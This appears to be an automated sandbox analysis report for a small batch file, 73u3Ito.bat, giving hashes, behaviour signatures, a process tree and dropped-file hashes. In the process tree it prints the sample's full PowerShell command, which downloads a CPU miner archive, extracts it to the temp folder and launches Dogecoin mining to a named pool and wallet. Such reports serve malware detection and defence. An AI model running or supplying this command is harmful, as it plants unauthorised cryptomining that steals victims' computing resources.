Analysis
- max time kernel: 1800s
- max time network: 1807s
- platform: windows10-1703_x64
- resource: win10-20231215-ja
- resource tags: arch:x64, arch:x86, image:win10-20231215-ja, locale:ja-jp, os:windows10-1703-x64, system, windows
- submitted: 03/02/2024, 10:59
Static task: static1
Behavioral task: behavioral1
- Sample: 73u3Ito.bat
- Resource: win10-20231215-ja
Behavioral task: behavioral2
- Sample: 73u3Ito.bat
- Resource: win10v2004-20231215-ja
General
- Target: 73u3Ito.bat
- Size: 499B
- MD5: fe74bff27516829a88cfbc6f6e99646f
- SHA1: 0c15d859211c79910b277d07e729bec7197a60cd
- SHA256: b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
- SHA512: a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98
Malware Config
Signatures
- Blocklisted process makes network request (2 IoCs)
  flow  pid  Process
  2     204  powershell.exe
  4     204  powershell.exe
- Executes dropped EXE (1 IoC)
  pid   Process
  1432  cpuminer-sse2.exe
- Loads dropped DLL (5 IoCs)
  pid   Process
  1432  cpuminer-sse2.exe
  1432  cpuminer-sse2.exe
  1432  cpuminer-sse2.exe
  1432  cpuminer-sse2.exe
  1432  cpuminer-sse2.exe
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  pid  Process
  204  powershell.exe
  204  powershell.exe
  204  powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  description              pid  Process
  Token: SeDebugPrivilege  204  powershell.exe
- Suspicious use of WriteProcessMemory (6 IoCs)
  description                       pid   Process         procid_target
  PID 4296 wrote to memory of 204   4296  cmd.exe         75
  PID 4296 wrote to memory of 204   4296  cmd.exe         75
  PID 204 wrote to memory of 2256   204   powershell.exe  76
  PID 204 wrote to memory of 2256   204   powershell.exe  76
  PID 2256 wrote to memory of 1432  2256  cmd.exe         78
  PID 2256 wrote to memory of 1432  2256  cmd.exe         78
Processes
- [1] C:\Windows\system32\cmd.exe (PID 4296)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
  Signatures: Suspicious use of WriteProcessMemory
  - [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 204)
    Command line: powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"
    Signatures: Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\cmd.exe (PID 2256)
      Command line: "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
      Signatures: Suspicious use of WriteProcessMemory
      - [4] C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe (PID 1432)
        Command line: cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
        Signatures: Executes dropped EXE; Loads dropped DLL
Network
MITRE ATT&CK Matrix
Downloads
- Filesize: 1B
  MD5: c4ca4238a0b923820dcc509a6f75849b
  SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
  SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
  SHA512: 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
- Filesize: 637KB
  MD5: 784f70a59ad38f3107fec67d684a6122
  SHA1: 9d579085b4e696c93af960681ab4e3710d3f6207
  SHA256: 9ba4273c809d92d4233b7fcc6f4d9c1bf89e5163eeb551fd0dc7c5d62b475616
  SHA512: 93ab2c8c55497bcc389840c438da33891ffd86a6755672806f54f1b0c1318eca41641e4a582116a07f2525c91d3f39bd3e6c7a4cebf45bf2fee9ce10251541bb
- Filesize: 593KB
  MD5: 4d7aec6b22d1db8f3594531f4a237845
  SHA1: 71695a2f55361d5a6e626528573c3ecb552a352c
  SHA256: 243536710d81959c33e04ddff13b21149b8db2f3ddd875f49742df93b0e4a98e
  SHA512: 0a8d399914efbcb89c0e72c43b964b8a0086b92c5fe5b4b5a56c7c6e01cd2e5c6bae8092b78b41eb87af2184127869bc90ebfa4fe940aa1e46983179f1261927
- Filesize: 300KB
  MD5: 04ea23ea29f6d2cba72004c7dd4ab470
  SHA1: bb1d7e7a036ed10c5f1de5c7213df0fc1d17bee0
  SHA256: 09ae248b88ef27a05d59991cfc273ed5e41c87b39ce91e0b51c47130f0a67b3d
  SHA512: 86f6cf9a4315d774ae205f77cc4dfaf3f27e6dde2a224c6a0f55888a49bdf325d27eea8d241d21240379fae1201d625e310edd383dc26534ce4003ecfe4458db
- Filesize: 589KB
  MD5: 6fc8e4914458ef6ac594a04e01005f8c
  SHA1: 656e2c0d29eb0d6bed0e97d3ac70381b6a0c1b25
  SHA256: 7a3cf68463451d20364b4b4b47a57bfb630396e0eaed63bc6cd9a7f2121f1611
  SHA512: 0a6353fed3afcf67e96cc8aa86eab857fa58dba0d8eb2a47da5404131c8a1b54ae0cc0682cf635ad776803cb6efd9452950b9c0d623eeec78164de02fdc53711
- Filesize: 660KB
  MD5: 041647cf492808f16ab0e1f1644f0bf7
  SHA1: a3744c2a5cbe198da69de758ca0843a4aa802d87
  SHA256: bc55e0e70dd4861a8b52c2038e0c44fb3e9334e9079d79a401b31e2c319c181f
  SHA512: e3b900e876e770129bf438a768c9d12f403bcafa2bcca58816cd84fcb703a5d8b06b05e2ddbd4231d8fb9efa120f15d16d42846136bf8faff7165966177d3f61
- Filesize: 259KB
  MD5: aadb714d75b37753857ca43d0f4b82cc
  SHA1: 4c9223e0821ceaea058c769a7cef06a6a5a5b40c
  SHA256: fde72a8e7e0e6331e082faaab40cbaa648fb38ce0d607a95103549f7d69bae8f
  SHA512: 4bec45781904bfd9e069d53ff30c1df3578878e855fbecad9c9f4dd3cb9ee3ea621f38643d5b9963de814d9e8fb3cb7abe8d601621ea366606fdd134c9905433
- Filesize: 309KB
  MD5: a934921c0388cf46096a803afebf1e8e
  SHA1: 3e1b96c27e20ca71010c983af981d3debf444f37
  SHA256: 55c5b676d2df786ebe0cf6b4c769dfa1522ea25d4156954bd3934f84e11f93f2
  SHA512: baf45515fc1136bf2b86b690cb8e5f31c3418c06bad79ef9e05ab44be7e3720b6fcabfaad42b289ec04acc6e583fb00e324c3385acd4eae8cdb58b7892219903
- Filesize: 373KB
  MD5: c3d46df45f185f8a58cf26449e70e559
  SHA1: f9dc100abcf36e0d9351dcf5c3334caee1bfe6fa
  SHA256: d237158d4a02871d0e605f2bc5f43ca9a8b0d8a70ccdd3ceae2ff2dcf895bef2
  SHA512: 901492daacab138433d6391859ec0bb7162535290e234463610e34b634d3b0112e88d056ea21a161bcf3fa54f2583a7df4b9911649b21620cb5259a212d66eff
- Filesize: 376KB
  MD5: b1c0d06f72fc09422bb4ad337372e7e6
  SHA1: dda928bdda3961415f09b99e0ada7227eef28a56
  SHA256: 355f1cc0b133887904ed732d946513321963f5c5a0d208329e95ed8195834259
  SHA512: a07f69c16e44d67341b9a657d2a2c725c70198d37154f18fb96df3563b8b18377994c7468a292ff263840b93dda4776ce40214aa199dd6c7685898b089f84c74
- Filesize: 211KB
  MD5: 73e7b436354612890085cf0f348a6d0f
  SHA1: 17c721cdf992d463b65b4c020cd562713983dfd4
  SHA256: edcf004e3917ee6538d4f64a88ebf8be0ad2c12ea0fb28c7965f1dad288bac2e
  SHA512: cece0d88191c35a20d6442533d0c796968a817afc49e3431c5942fab6f4ee8f6bea897778bf7b44d0bd26c7245934586f7787d0853ff1c645e10c31388d7ab3a
- Filesize: 270KB
  MD5: dbe752d654104a7f61bf6547a11d0860
  SHA1: 8751ff8bd4a48b948bdd5332fc0c777caef74088
  SHA256: df6cee4ee91a210618f1fef0b0c667931fc736bc6ecc0f4719913a5a16a6d06e
  SHA512: 878dda84fbada6bc2c2c7a9a3853e85011d9f663cd2ebcf9b4a7694fcda013ba15bf025727d028c24b3f768b0a18df0e7100761782800631a6edd8bfc77a814f